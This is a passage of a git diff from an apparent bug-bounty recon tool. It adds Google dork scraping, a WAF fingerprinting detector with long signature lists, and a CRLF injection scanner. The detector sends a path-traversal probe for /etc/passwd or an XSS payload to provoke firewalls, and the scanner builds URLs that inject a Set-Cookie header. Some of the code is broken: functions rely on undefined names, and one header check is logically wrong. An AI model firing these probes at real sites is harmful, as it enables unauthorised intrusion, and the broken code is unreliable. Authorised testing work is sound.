Parse Google response + if scrap_urls: urls = [] soup = BeautifulSoup(response.text, "html.parser") result_block = soup.find_all("div", attrs={"class": "g"}) @@ -130,6 +147,11 @@ def start_request( if description_box: description = description_box.text if link and title and description: + cprint( + f"Link appended to potential urls: {link}", + "yellow", + file=sys.stderr, + ) if advanced: urls.append( SearchResult(link["href"], title.text, description) @@ -140,10 +162,19 @@ def start_request( # Placeholder for URL extraction logic return urls # Return the category and a placeholder result except requests.exceptions.ProtocolError: - cprint("WAF is dropping suspicious requests. Scanning will continue after 10 minutes.", color="red", file=sys.stderr) + cprint( + "WAF is dropping suspicious requests. Scanning will continue after 10 minutes.", + color="red", + file=sys.stderr, + ) time.sleep(WAF_DELAY) except requests.exceptions.RequestException as e: - # cprint(f"Error searching for {full_query} with proxy {proxy}: {e}", 'red', file=sys.stderr) - time.sleep(2) # Wait before retrying + cprint( + f"Error searching for {full_query} with proxy {proxies['https']}: {e}", + "red", + file=sys.stderr, + ) + time.sleep(CURRENT_DELAY) # Wait before retrying + # TODO add backoff timer for delay ? finally: return urls diff --git a/bounty_drive/utils/request_parser.py b/bounty_drive/utils/request_parser.py new file mode 100644 index 0000000..0f007f8 --- /dev/null +++ b/bounty_drive/utils/request_parser.py @@ -0,0 +1,52 @@ +# -*- coding: utf-8 -*- + +from urllib.parse import parse_qs +from http.cookies import SimpleCookie + + +def parse_post_data(data): + """ + parses the post data + """ + result = parse_qs(data, strict_parsing=True) + for key in result: + if len(result[key]) == 1: + result[key] = result[key][0] + data = result + + return data + + +def parse_cookies(cookies): + """ + converts the raw data to dict + """ + raw_data = cookies + cookie = SimpleCookie() + cookie.load(raw_data) + cookies = {} + for key, morsel in cookie.items(): + cookies[key] = morsel.value + + return cookies + + +def extract_headers(headers): + """ + extracts the headers and returns a dict + """ + headers = headers.replace("\\n", "\n") + return parse_headers(headers) + + +def parse_headers(string): + """ + parses the headers and creates a dict + """ + new_headers = {} + for line in string.split("\n"): + if len(line) > 1: + splitted = line.split(":") + new_headers[splitted[0]] = ":".join(splitted[1:]).strip() + + return new_headers diff --git a/bounty_drive/utils/results_manager.py b/bounty_drive/utils/results_manager.py index 67a4f41..5174451 100644 --- a/bounty_drive/utils/results_manager.py +++ b/bounty_drive/utils/results_manager.py @@ -3,7 +3,7 @@ from termcolor import cprint from utils.app_config import * - + ######################################################################################### # File writing functions ######################################################################################### @@ -18,7 +18,7 @@ "api": threading.Lock(), "web": threading.Lock(), "secret": threading.Lock(), - "dlphp": threading.Lock(), + "dowload-php": threading.Lock(), "backup": threading.Lock(), "github": threading.Lock(), } @@ -26,9 +26,11 @@ # Thread-safe addition to results lists def safe_add_result(result): # TODO category not working, all go to xss - category, urls = result + category, urls, dork = result if urls: - cprint(f"Adding {len(urls)} URLs to {category} list...", 'blue', file=sys.stderr) + cprint( + f"Adding {len(urls)} URLs to {category} list...", "blue", file=sys.stderr + ) for url in urls: if url: if "https://www.google.com/sorry/" not in url: @@ -36,15 +38,40 @@ def safe_add_result(result): with LOCKS["github"]: with open(GITHUB_FILE_PATH, "a") as file: file.write(url + "\n") + with open( + GITHUB_FILE_PATH.replace(".txt", "_dork.txt"), "a" + ) as file: + file.write(dork + "\n") POTENTIAL_PATHS["github"][1].add(url) - cprint(f"Added {url} to github list", 'green', file=sys.stderr) + cprint( + f"Added {url} to github list", "green", file=sys.stderr + ) else: with LOCKS[category]: # Ensure thread-safe write operation - with open(POTENTIAL_PATHS[category][0], "a") as file: # Open file in append mode + with open( + POTENTIAL_PATHS[category][0], "a" + ) as file: # Open file in append mode file.write(url + "\n") # Write URL to file - POTENTIAL_PATHS[category][1].add(url) # Optionally maintain the set - cprint(f"Added {url} to {category} list", 'green', file=sys.stderr) + with open( + POTENTIAL_PATHS[category][0].replace( + ".txt", "_dork.txt" + ), + "a", + ) as file: + file.write(dork + "\n") + POTENTIAL_PATHS[category][1].add( + url + ) # Optionally maintain the set + cprint( + f"Added {url} to {category} list", + "blue", + file=sys.stderr, + ) else: - cprint(f"Google blocked us from accessing {url}", 'red', file=sys.stderr) + cprint( + f"Google blocked us from accessing {url}", + "red", + file=sys.stderr, + ) else: - cprint(f"No URLs found for {category} dorks...", 'red', file=sys.stderr) + cprint(f"No URLs found for {category} dorks...", "red", file=sys.stderr) diff --git a/bounty_drive/utils/waf_mitigation.py b/bounty_drive/utils/waf_mitigation.py index 8bba42b..4aea1aa 100644 --- a/bounty_drive/utils/waf_mitigation.py +++ b/bounty_drive/utils/waf_mitigation.py @@ -3,20 +3,23 @@ ######################################################################################### # from https://github.com/s0md3v/XSStrike/blob/master/core/wafDetector.py +import glob import json import re -import sys - +import eventlet, requests from termcolor import cprint from utils.request_manager import start_request +# from bounty_drive.attacks.xss.xss_config import XSS_TEST_PAYLOAD + -def waf_detector(proxies, url, params, headers, GET, delay, timeout): - with open(sys.path[0] + "waf_signatures.json", "r") as file: - wafSignatures = json.load(file) +def waf_detector(proxies, url, params, headers, GET, mode="xss"): # a payload which is noisy enough to provoke the WAF - noise = '<script>alert("XSS")</script>' + if mode == "xss": + noise = XSS_TEST_PAYLOAD + else: + noise = "../../../etc/passwd" params["xss"] = noise # Opens the noise injected payload response = start_request( @@ -28,29 +31,133 @@ def waf_detector(proxies, url, params, headers, GET, delay, timeout): cprint("Waf Detector code: {}".format(code)) cprint("Waf Detector headers:", response.headers) + waf_signatures_files = glob.glob("waf_signature/*.json", recursive=True) + bestMatch = [0, None] + for waf_signatures_file in waf_signatures_files: + with open(waf_signatures_file, "r") as file: + wafSignatures = json.load(file) + if int(code) >= 400: + for wafName, wafSignature in wafSignatures.items(): + score = 0 + pageSign = wafSignature["page"] + codeSign = wafSignature["code"] + headersSign = wafSignature["headers"] + if pageSign: + if re.search(pageSign, page, re.I): + score += 1 + if codeSign: + if re.search(codeSign, code, re.I): + score += 0.5 # increase the overall score by a smaller amount because http codes aren't strong indicators + if headersSign: + if re.search(headersSign, headers, re.I): + score += 1 + # if the overall score of the waf is higher than the previous one + if score > bestMatch[0]: + del bestMatch[:] # delete the previous one + bestMatch.extend([score, wafName]) # and add this one + else: + return None if int(code) >= 400: - bestMatch = [0, None] - for wafName, wafSignature in wafSignatures.items(): - score = 0 - pageSign = wafSignature["page"] - codeSign = wafSignature["code"] - headersSign = wafSignature["headers"] - if pageSign: - if re.search(pageSign, page, re.I): - score += 1 - if codeSign: - if re.search(codeSign, code, re.I): - score += 0.5 # increase the overall score by a smaller amount because http codes aren't strong indicators - if headersSign: - if re.search(headersSign, headers, re.I): - score += 1 - # if the overall score of the waf is higher than the previous one - if score > bestMatch[0]: - del bestMatch[:] # delete the previous one - bestMatch.extend([score, wafName]) # and add this one if bestMatch[0] != 0: return bestMatch[1] else: return None - else: - return None + + +def heuristic_scanner( + url, + payload, + method, + cookie, + headers, + timeout, + ssl, + data, + verbose, + silent, + stable, + delay, +): + """ + A basic scan to check if the URL is vulnerable or not + """ + url = url.strip() + scheme, host = urlparse(url).scheme, urlparse(url).netloc + url = scheme + "://" + host + if not url.endswith("/"): + url = url + "/" + final_url = url + payload + response = requester.do( + final_url, + method, + cookie, + headers, + timeout, + ssl, + data, + verbose, + silent, + stable, + delay, + ) + try: + code, rheaders = response[1], str(response[2]) + if not int(code) >= 400: + if "nefcore" and "crlfsuite" in rheaders: + heuristic_result.add(final_url) + except TypeError: + pass + + +# https://github.com/MichaelStott/CRLF-Injection-Scanner/blob/master/scanner.py#L28 +class CrlfScanner: + """Scans URLs for CRLF injection.""" + + # List of web protocols. + PROTOCOL_LIST = ["http", "https"] + + # Append this to beginning of escape sequence. + APPEND_LIST = ["", "crlf", "?crlf=", "#"] + + # List of escape sequences that possibly result in crlf. + ESCAPE_LIST = ["%0d", "%0a", "%0d%0a", "%23%0d", "%23%0a", "%23%0d%0a"] + + # By default, the scanner will try to inject a Set-Cookie statment. + DEFAULT_INJ = "Set-Cookie:param=crlf;" + + # If we don't get a response within the TIMEOUT, terminate the current scan. + TIMEOUT = 5 + + def __init__(self): + self.inj_str = self.DEFAULT_INJ + + def generate_vuln_urls(self, url): + """Generate URLS that may be vulnerable to CRLF injection.""" + vuln_urls = [] + if not url.endswith("/"): + url += "/" + for protocol in self.PROTOCOL_LIST: + for append in self.APPEND_LIST: + for escape in self.ESCAPE_LIST: + vuln_urls.append( + protocol + "://" + url + append + escape + self.inj_str + ) + return vuln_urls + + def scan(self, url): + """Scan target URL for CRLF injection""" + result = False + session = requests.Session() + with eventlet.Timeout(self.TIMEOUT): + try: + session.get(url) + except KeyboardInterrupt: + raise + except: + pass + if ( + "param" in session.cookies.get_dict() + and "crlf" in session.cookies.get_dict().values() + ): + result = True + return result diff --git a/bounty_drive/utils/web_scraper.py b/bounty_drive/utils/web_scraper.py new file mode 100644 index 0000000..70a9532 --- /dev/null +++ b/bounty_drive/utils/web_scraper.py @@ -0,0 +1,3 @@ +def crawl(url, urls): + raise NotImplementedError("Crawling not implemented for now") + return urls diff --git a/bounty_drive/waf_signature/waf_signatures.json b/bounty_drive/waf_signature/waf_signatures.json new file mode 100644 index 0000000..ca8e604 --- /dev/null +++ b/bounty_drive/waf_signature/waf_signatures.json @@ -0,0 +1,332 @@ +{ + "360 Web Application Firewall (360)": { + "code": "493", + "page": "/wzws-waf-cgi/", + "headers": "X-Powered-By-360wzb" + }, + "aeSecure": { + "code": "", + "page": "aesecure_denied.png", + "headers": "aeSecure-code" + }, + "Airlock (Phion/Ergon)": { + "code": "", + "page": "", + "headers": "AL[_-]?(SESS|LB)" + }, + "Anquanbao Web Application Firewall (Anquanbao)": { + "code": "405", + "page": "/aqb_cc/error/|hidden_intercept_time", + "headers": "X-Powered-By-Anquanbao" + }, + "Armor Protection (Armor Defense)": { + "code": "", + "page": "This request has been blocked by website protection from Armor", + "headers": "" + }, + "Application Security Manager (F5 Networks)": { + "code": "", + "page": "The requested URL was rejected\\. Please consult with your administrator\\.", + "headers": "" + }, + "Amazon Web Services Web Application Firewall (Amazon)": { + "code": "403", + "page": "", + "headers": "\\bAWS" + }, + "Yunjiasu Web Application Firewall (Baidu)": { + "code": "", + "page": "", + "headers": "yunjiasu-nginx" + }, + "Barracuda Web Application Firewall (Barracuda Networks)": { + "code": "", + "page": "", + "headers": "barra_counter_session=|(|\\b)barracuda_" + }, + "BIG-IP Application Security Manager (F5 Networks)": { + "code": "", + "page": "", + "headers": "BigIP|F5\\Z|\\bTS[0-9a-f]+=|X-WA-Info:|X-Cnection:" + }, + "BinarySEC Web Application Firewall (BinarySEC)": { + "code": "", + "page": "", + "headers": "binarysec" + }, + "BlockDoS": { + "code": "", + "page": "", + "headers": "BlockDos\\.net" + }, + "ChinaCache (ChinaCache Networks)": { + "code": "400", + "page": "", + "headers": "Powered-By-ChinaCache" + }, + "Cisco ACE XML Gateway (Cisco Systems)": { + "code": "", + "page": "", + "headers": "ACE XML Gateway" + }, + "Cloudbric Web Application Firewall (Cloudbric)": { + "code": "", + "page": "Cloudbric|Malicious Code Detected", + "headers": "" + }, + "CloudFlare Web Application Firewall (CloudFlare)": { + "code": "", + "page": "Attention Required! \\| Cloudflare|CloudFlare Ray ID:|var CloudFlare=|CLOUDFLARE_ERROR_500S_BOX", + "headers": "cloudflare|__cfduid=|cf-ray" + }, + "CloudFront (Amazon)": { + "code": "", + "page": "", + "headers": "Error from cloudfront" + }, + "Comodo Web Application Firewall (Comodo)": { + "code": "", + "page": "", + "headers": "Protected by COMODO WAF" + }, + "CrawlProtect (Jean-Denis Brun)": { + "code": "", + "page": "This site is protected by CrawlProtect", + "headers": "" + }, + "IBM WebSphere DataPower (IBM)": { + "code": "", + "page": "", + "headers": "X-Backside-Transport.*?(OK|FAIL)" + }, + "Deny All Web Application Firewall (DenyAll)": { + "code": "", + "page": "Condition Intercepted", + "headers": "sessioncookie" + }, + "Distil Web Application Firewall Security (Distil Networks)": { + "code": "", + "page": "", + "headers": "x-distil-cs" + }, + "DOSarrest (DOSarrest Internet Security)": { + "code": "", + "page": "", + "headers": "DOSarrest|X-DIS-Request-ID" + }, + "dotDefender (Applicure Technologies)": { + "code": "", + "page": "dotDefender Blocked Your Request|<meta name=\\.description\\. content=\\.Applicure is the leading provider of web application security|Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon)", + "headers": "X-dotDefender-denied" + }, + "EdgeCast Web Application Firewall (Verizon)": { + "code": "400", + "page": "", + "headers": "SERVER.*?ECDF" + }, + "ExpressionEngine (EllisLab)": { + "code": "", + "page": "Invalid (GET|POST) Data", + "headers": "" + }, + "FortiWeb Web Application Firewall (Fortinet)": { + "code": "", + "page": "\\.fgd_icon|\\.blocked|\\.authenticate", + "headers": "FORTIWAFSID=|cookiesession1=" + }, + "Hyperguard Web Application Firewall (art of defence)": { + "code": "", + "page": "", + "headers": "ODSESSION=" + }, + "Incapsula Web Application Firewall (Incapsula/Imperva)": { + "code": "", + "page": "Incapsula incident ID|_Incapsula_Resource|subject=WAF Block Page|If you feel you have been blocked in error, please contact Customer Support", + "headers": "X-Iinfo|incap_ses|visid_incap" + }, + "ISA Server (Microsoft)": { + "code": "", + "page": "The server denied the specified Uniform Resource Locator (URL)\\. Contact the server administrator\\.", + "headers": "" + }, + "Jiasule Web Application Firewall (Jiasule)": { + "code": "403", + "page": "static\\.jiasule\\.com/static/js/http_error\\.js|notice-jiasule", + "headers": "jiasule-WAF|__jsluid=|jsl_tracking" + }, + "KS-WAF (Knownsec)": { + "code": "", + "page": "ks-waf-error\\.png'", + "headers": "" + }, + "KONA Security Solutions (Akamai Technologies)": { + "code": "400|403|501", + "page": "", + "headers": "AkamaiGHost" + }, + "ModSecurity: Open Source Web Application Firewall (Trustwave)": { + "code": "", + "page": "This error was generated by Mod_Security|One or more things in your request were suspicious|rules of the mod_security module", + "headers": "Mod_Security|NOYB" + }, + "NAXSI (NBS System)": { + "code": "", + "page": "", + "headers": "naxsi/waf" + }, + "NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)": { + "code": "", + "page": "", + "headers": "NCI__SessionId=" + }, + "NetScaler (Citrix Systems)": { + "code": "", + "page": "", + "headers": "ns_af=|citrix_ns_id|NSC_|NS-CACHE" + }, + "Newdefend Web Application Firewall (Newdefend)": { + "code": "", + "page": "", + "headers": "newdefend" + }, + "NSFOCUS Web Application Firewall (NSFOCUS)": { + "code": "", + "page": "", + "headers": "NSFocus" + }, + "Palo Alto Firewall (Palo Alto Networks)": { + "code": "", + "page": "has been blocked in accordance with company policy", + "headers": "" + }, + "Profense Web Application Firewall (Armorlogic)": { + "code": "", + "page": "", + "headers": "PLBSID=|Profense" + }, + "AppWall (Radware)": { + "code": "", + "page": "Unauthorized Activity Has Been Detected.*?Case Number:", + "headers": "X-SL-CompState" + }, + "Reblaze Web Application Firewall (Reblaze)": { + "code": "", + "page": "", + "headers": "rbzid=|Reblaze Secure Web Gateway" + }, + "ASP.NET RequestValidationMode (Microsoft)": { + "code": "500", + "page": "ASP\\.NET has detected data in the request that is potentially dangerous|Request Validation has detected a potentially dangerous client input value|HttpRequestValidationException", + "headers": "" + }, + "Safe3 Web Application Firewall": { + "code": "", + "page": "", + "headers": "Safe3" + }, + "Safedog Web Application Firewall (Safedog)": { + "code": "", + "page": "", + "headers": "WAF/2\\.0|safedog" + }, + "SecureIIS Web Server Security (BeyondTrust)": { + "code": "", + "page": "SecureIIS.*?Web Server Protection|http://www\\.eeye\\.com/SecureIIS/|\\?subject=[^>]*SecureIIS Error", + "headers": "" + }, + "SEnginx (Neusoft Corporation)": { + "code": "", + "page": "SENGINX-ROBOT-MITIGATION", + "headers": "" + }, + "TrueShield Web Application Firewall (SiteLock)": { + "code": "", + "page": "SiteLock Incident ID|sitelock-site-verification|sitelock_shield_logo", + "headers": "" + }, + "SonicWALL (Dell)": { + "code": "", + "page": "This request is blocked by the SonicWALL|#shd|#nsa_banner|Web Site Blocked.*?\\bnsa_banner", + "headers": "SonicWALL" + }, + "UTM Web Protection (Sophos)": { + "code": "", + "page": "Powered by UTM Web Protection", + "headers": "" + }, + "Stingray Application Firewall (Riverbed / Brocade)": { + "code": "403|500", + "page": "", + "headers": "X-Mapping-" + }, + "CloudProxy WebSite Firewall (Sucuri)": { + "code": "403", + "page": "Access Denied.*?Sucuri Website Firewall|Sucuri WebSite Firewall.*?Access Denied|Questions\\?.*?cloudproxy@sucuri\\.net", + "headers": "Sucuri/Cloudproxy|X-Sucuri" + }, + "Tencent Cloud Web Application Firewall (Tencent Cloud Computing)": { + "code": "405", + "page": "waf\\.tencent-cloud\\.com", + "headers": "" + }, + "Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)": { + "code": "", + "page": "", + "headers": "st8(id|_wat|_wlf)" + }, + "TrafficShield (F5 Networks)": { + "code": "", + "page": "", + "headers": "F5-TrafficShield|ASINFO=" + }, + "UrlScan (Microsoft)": { + "code": "", + "page": "Rejected-By-UrlScan", + "headers": "Rejected-By-UrlScan" + }, + "USP Secure Entry Server (United Security Providers)": { + "code": "", + "page": "", + "headers": "Secure Entry Server" + }, + "Varnish FireWall (OWASP)": { + "code": "", + "page": "Request rejected by xVarnish-WAF|\\bXID: \\d+", + "headers": "" + }, + "Wallarm Web Application Firewall (Wallarm)": { + "code": "", + "page": "", + "headers": "nginx-wallarm" + }, + "WatchGuard (WatchGuard Technologies)": { + "code": "", + "page": "", + "headers": "WatchGuard" + }, + "WebKnight Application Firewall (AQTRONIX)": { + "code": "999", + "page": "WebKnight Application Firewall Alert|AQTRONIX WebKnight", + "headers": "WebKnight" + }, + "Wordfence (Feedjit)": { + "code": "", + "page": "This response was generated by Wordfence|Your access to this site has been limited", + "headers": "" + }, + "Zenedge Web Application Firewall (Zenedge)": { + "code": "", + "page": "zenedge/assets/", + "headers": "ZENEDGE" + }, + "Yundun Web Application Firewall (Yundun)": { + "code": "", + "page": "", + "headers": "YUNDUN" + }, + "Yunsuo Web Application Firewall (Yunsuo)": { + "code": "", + "page": "<img class=.yunsuologo.", + "headers": "yunsuo_session" + } +} diff --git a/bounty_drive/waf_signature/waf_signatures_2.json b/bounty_drive/waf_signature/waf_signatures_2.json new file mode 100644 index 0000000..997dc24 --- /dev/null +++ b/bounty_drive/waf_signature/waf_signatures_2.json @@ -0,0 +1,956 @@ +{ + "360 Web Application Firewall (360)": { + "code": "493", + "page": "/wzws-waf-cgi/", + "headers": "X-Powered-By-360wzb", + "cookie": "" + }, + "aeSecure": { + "code": "", + "page": "aesecure_denied.png", + "headers": "aeSecure-code", + "cookie": "" + }, + "Airlock (Phion/Ergon)": { + "code": "", + "page": "", + "headers": "AL[_-]?(SESS|LB)", + "cookie": "" + }, + "Anquanbao Web Application Firewall (Anquanbao)": { + "code": "405", + "page": "/aqb_cc/error/|hidden_intercept_time", + "headers": "X-Powered-By-Anquanbao", + "cookie": "" + }, + "Armor Protection (Armor Defense)": { + "code": "", + "page": "This request has been blocked by website protection from Armor", + "headers": "", + "cookie": "" + }, + "Application Security Manager (F5 Networks)": { + "code": "", + "page": "The requested URL was rejected\\. Please consult with your administrator\\.", + "headers": "", + "cookie": "" + }, + "Amazon Web Services Web Application Firewall (Amazon)": { + "code": "403", + "page": "", + "headers": "\\bAWS", + "cookie": "" + }, + "Yunjiasu Web Application Firewall (Baidu)": { + "code": "", + "page": "", + "headers": "yunjiasu-nginx", + "cookie": "" + }, + "Barracuda Web Application Firewall (Barracuda Networks)": { + "code": "", + "page": "", + "headers": "barra_counter_session=|(|\\b)barracuda_", + "cookie": "" + }, + "BIG-IP Application Security Manager (F5 Networks)": { + "code": "", + "page": "", + "headers": "BigIP|F5\\Z|\\bTS[0-9a-f]+=|X-WA-Info:|X-Cnection:", + "cookie": "" + }, + "BinarySEC Web Application Firewall (BinarySEC)": { + "code": "", + "page": "", + "headers": "binarysec", + "cookie": "" + }, + "BlockDoS": { + "code": "", + "page": "", + "headers": "BlockDos\\.net", + "cookie": "" + }, + "ChinaCache (ChinaCache Networks)": { + "code": "400", + "page": "", + "headers": "Powered-By-ChinaCache", + "cookie": "" + }, + "Cisco ACE XML Gateway (Cisco Systems)": { + "code": "", + "page": "", + "headers": "ACE XML Gateway", + "cookie": "" + }, + "Cloudbric Web Application Firewall (Cloudbric)": { + "code": "", + "page": "Cloudbric|Malicious Code Detected", + "headers": "", + "cookie": "" + }, + "CloudFlare Web Application Firewall (CloudFlare)": { + "code": "", + "page": "Attention Required! \\| Cloudflare|CloudFlare Ray ID:|var CloudFlare=|CLOUDFLARE_ERROR_500S_BOX", + "headers": "cloudflare|__cfduid=|cf-ray", + "cookie": "" + }, + "CloudFront (Amazon)": { + "code": "", + "page": "", + "headers": "Error from cloudfront", + "cookie": "" + }, + "Comodo Web Application Firewall (Comodo)": { + "code": "", + "page": "", + "headers": "Protected by COMODO WAF", + "cookie": "" + }, + "CrawlProtect (Jean-Denis Brun)": { + "code": "", + "page": "This site is protected by CrawlProtect", + "headers": "", + "cookie": "" + }, + "IBM WebSphere DataPower (IBM)": { + "code": "", + "page": "", + "headers": "X-Backside-Transport.*?(OK|FAIL)", + "cookie": "" + }, + "Deny All Web Application Firewall (DenyAll)": { + "code": "", + "page": "Condition Intercepted", + "headers": "sessioncookie", + "cookie": "" + }, + "Distil Web Application Firewall Security (Distil Networks)": { + "code": "", + "page": "", + "headers": "x-distil-cs", + "cookie": "" + }, + "DOSarrest (DOSarrest Internet Security)": { + "code": "", + "page": "", + "headers": "DOSarrest|X-DIS-Request-ID", + "cookie": "" + }, + "dotDefender (Applicure Technologies)": { + "code": "", + "page": "dotDefender Blocked Your Request|<meta name=\\.description\\. content=\\.Applicure is the leading provider of web application security|Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon)", + "headers": "X-dotDefender-denied", + "cookie": "" + }, + "EdgeCast Web Application Firewall (Verizon)": { + "code": "400", + "page": "", + "headers": "SERVER.*?ECDF", + "cookie": "" + }, + "ExpressionEngine (EllisLab)": { + "code": "", + "page": "Invalid (GET|POST) Data", + "headers": "", + "cookie": "" + }, + "FortiWeb Web Application Firewall (Fortinet)": { + "code": "", + "page": "\\.fgd_icon|\\.blocked|\\.authenticate", + "headers": "FORTIWAFSID=|cookiesession1=", + "cookie": "" + }, + "Hyperguard Web Application Firewall (art of defence)": { + "code": "", + "page": "", + "headers": "ODSESSION=", + "cookie": "" + }, + "Incapsula Web Application Firewall (Incapsula/Imperva)": { + "code": "", + "page": "Incapsula incident ID|_Incapsula_Resource|subject=WAF Block Page|If you feel you have been blocked in error, please contact Customer Support", + "headers": "X-Iinfo|incap_ses|visid_incap", + "cookie": "" + }, + "ISA Server (Microsoft)": { + "code": "", + "page": "The server denied the specified Uniform Resource Locator (URL)\\. Contact the server administrator\\.", + "headers": "", + "cookie": "" + }, + "Jiasule Web Application Firewall (Jiasule)": { + "code": "403", + "page": "static\\.jiasule\\.com/static/js/http_error\\.js|notice-jiasule", + "headers": "jiasule-WAF|__jsluid=|jsl_tracking", + "cookie": "" + }, + "KS-WAF (Knownsec)": { + "code": "", + "page": "ks-waf-error\\.png'", + "headers": "", + "cookie": "" + }, + "KONA Security Solutions (Akamai Technologies)": { + "code": "400|403|501", + "page": "", + "headers": "AkamaiGHost", + "cookie": "" + }, + "ModSecurity: Open Source Web Application Firewall (Trustwave)": { + "code": "", + "page": "This error was generated by Mod_Security|One or more things in your request were suspicious|rules of the mod_security module", + "headers": "Mod_Security|NOYB", + "cookie": "" + }, + "NAXSI (NBS System)": { + "code": "", + "page": "", + "headers": "naxsi/waf", + "cookie": "" + }, + "NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)": { + "code": "", + "page": "", + "headers": "NCI__SessionId=", + "cookie": "" + }, + "NetScaler (Citrix Systems)": { + "code": "", + "page": "", + "headers": "ns_af=|citrix_ns_id|NSC_|NS-CACHE", + "cookie": "" + }, + "Newdefend Web Application Firewall (Newdefend)": { + "code": "", + "page": "", + "headers": "newdefend", + "cookie": "" + }, + "NSFOCUS Web Application Firewall (NSFOCUS)": { + "code": "", + "page": "", + "headers": "NSFocus", + "cookie": "" + }, + "Palo Alto Firewall (Palo Alto Networks)": { + "code": "", + "page": "has been blocked in accordance with company policy", + "headers": "", + "cookie": "" + }, + "Profense Web Application Firewall (Armorlogic)": { + "code": "", + "page": "", + "headers": "PLBSID=|Profense", + "cookie": "" + }, + "AppWall (Radware)": { + "code": "", + "page": "Unauthorized Activity Has Been Detected.*?Case Number:", + "headers": "X-SL-CompState", + "cookie": "" + }, + "Reblaze Web Application Firewall (Reblaze)": { + "code": "", + "page": "", + "headers": "rbzid=|Reblaze Secure Web Gateway", + "cookie": "" + }, + "ASP.NET RequestValidationMode (Microsoft)": { + "code": "500", + "page": "ASP\\.NET has detected data in the request that is potentially dangerous|Request Validation has detected a potentially dangerous client input value|HttpRequestValidationException", + "headers": "", + "cookie": "" + }, + "Safe3 Web Application Firewall": { + "code": "", + "page": "", + "headers": "Safe3", + "cookie": "" + }, + "Safedog Web Application Firewall (Safedog)": { + "code": "", + "page": "", + "headers": "WAF/2\\.0|safedog", + "cookie": "" + }, + "SecureIIS Web Server Security (BeyondTrust)": { + "code": "", + "page": "SecureIIS.*?Web Server Protection|http://www\\.eeye\\.com/SecureIIS/|\\?subject=[^>]*SecureIIS Error", + "headers": "", + "cookie": "" + }, + "SEnginx (Neusoft Corporation)": { + "code": "", + "page": "SENGINX-ROBOT-MITIGATION", + "headers": "", + "cookie": "" + }, + "TrueShield Web Application Firewall (SiteLock)": { + "code": "", + "page": "SiteLock Incident ID|sitelock-site-verification|sitelock_shield_logo", + "headers": "", + "cookie": "" + }, + "SonicWALL (Dell)": { + "code": "", + "page": "This request is blocked by the SonicWALL|#shd|#nsa_banner|Web Site Blocked.*?\\bnsa_banner", + "headers": "SonicWALL", + "cookie": "" + }, + "UTM Web Protection (Sophos)": { + "code": "", + "page": "Powered by UTM Web Protection", + "headers": "", + "cookie": "" + }, + "Stingray Application Firewall (Riverbed / Brocade)": { + "code": "403|500", + "page": "", + "headers": "X-Mapping-", + "cookie": "" + }, + "CloudProxy WebSite Firewall (Sucuri)": { + "code": "403", + "page": "Access Denied.*?Sucuri Website Firewall|Sucuri WebSite Firewall.*?Access Denied|Questions\\?.*?cloudproxy@sucuri\\.net", + "headers": "Sucuri/Cloudproxy|X-Sucuri", + "cookie": "" + }, + "Tencent Cloud Web Application Firewall (Tencent Cloud Computing)": { + "code": "405", + "page": "waf\\.tencent-cloud\\.com", + "headers": "", + "cookie": "" + }, + "Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)": { + "code": "", + "page": "", + "headers": "st8(id|_wat|_wlf)", + "cookie": "" + }, + "TrafficShield (F5 Networks)": { + "code": "", + "page": "", + "headers": "F5-TrafficShield|ASINFO=", + "cookie": "" + }, + "UrlScan (Microsoft)": { + "code": "", + "page": "Rejected-By-UrlScan", + "headers": "Rejected-By-UrlScan", + "cookie": "" + }, + "USP Secure Entry Server (United Security Providers)": { + "code": "", + "page": "", + "headers": "Secure Entry Server", + "cookie": "" + }, + "Varnish FireWall (OWASP)": { + "code": "", + "page": "Request rejected by xVarnish-WAF|\\bXID: \\d+", + "headers": "", + "cookie": "" + }, + "Wallarm Web Application Firewall (Wallarm)": { + "code": "", + "page": "", + "headers": "nginx-wallarm", + "cookie": "" + }, + "WatchGuard (WatchGuard Technologies)": { + "code": "", + "page": "", + "headers": "WatchGuard", + "cookie": "" + }, + "WebKnight Application Firewall (AQTRONIX)": { + "code": "999", + "page": "WebKnight Application Firewall Alert|AQTRONIX WebKnight", + "headers": "WebKnight", + "cookie": "" + }, + "Wordfence (Feedjit)": { + "code": "", + "page": "This response was generated by Wordfence|Your access to this site has been limited", + "headers": "", + "cookie": "" + }, + "Zenedge Web Application Firewall (Zenedge)": { + "code": "", + "page": "zenedge/assets/", + "headers": "ZENEDGE", + "cookie": "" + }, + "Yundun Web Application Firewall (Yundun)": { + "code": "", + "page": "", + "headers": "YUNDUN", + "cookie": "" + }, + "Yunsuo Web Application Firewall (Yunsuo)": { + "code": "", + "page": "<img class=.yunsuologo.", + "headers": "yunsuo_session", + "cookie": "" + }, + "AireeCDN (Airee)": { + "code": "", + "page": "airee\\.cloud", + "headers": "Airee", + "cookie": "" + }, + "Alert Logic": { + "code": "", + "page": "<(title|h\\d{1})>requested url cannot be found|we are sorry.{0,10}?but the page you are looking for cannot be found|back to previous page|proceed to homepage|reference id", + "headers": "", + "cookie": "" + }, + "AliYunDun (Alibaba Cloud Computing)": { + "code": "405", + "page": "error(s)?\\.aliyun(dun)?\\.(com|net)?|cdn\\.aliyun(cs)?\\.com", + "headers": "", + "cookie": "aliyungf_tc=" + }, + "AnYu (AnYu Technologies)": { + "code": "", + "page": "anyu.{0,10}?the green channel|your access has been intercepted by anyu", + "headers": "", + "cookie": "" + }, + "Approach": { + "code": "", + "page": "approach.{0,10}?web application (firewall|filtering)|approach.{0,10}?infrastructure team", + "headers": "", + "cookie": "" + }, + "ArvanCloud": { + "code": "", + "page": "", + "headers": "ArvanCloud", + "cookie": "" + }, + "ASPA Firewall (ASPA Engineering Co.)": { + "code": "", + "page": "", + "headers": "ASPA[\\-_]?WAF|ASPA-Cache-Status", + "cookie": "" + }, + "ASP.NET Generic (Microsoft)": { + "code": "", + "page": "iis (\\d+.)+?detailed error|potentially dangerous request querystring|application error from being viewed remotely (for security reasons)?|An application error occurred on the server", + "headers": "", + "cookie": "" + }, + "Astra (Czar Securities)": { + "code": "", + "page": "astrawebsecurity\\.freshdesk\\.com|www\\.getastra\\.com/assets/images", + "headers": "", + "cookie": "cz_astra_csrf_cookie" + }, + "AWS Elastic Load Balancer (Amazon)": { + "code": "", + "page": "", + "headers": "X-AMZ-ID|X-AMZ-Request-ID", + "cookie": "aws.?alb=" + }, + 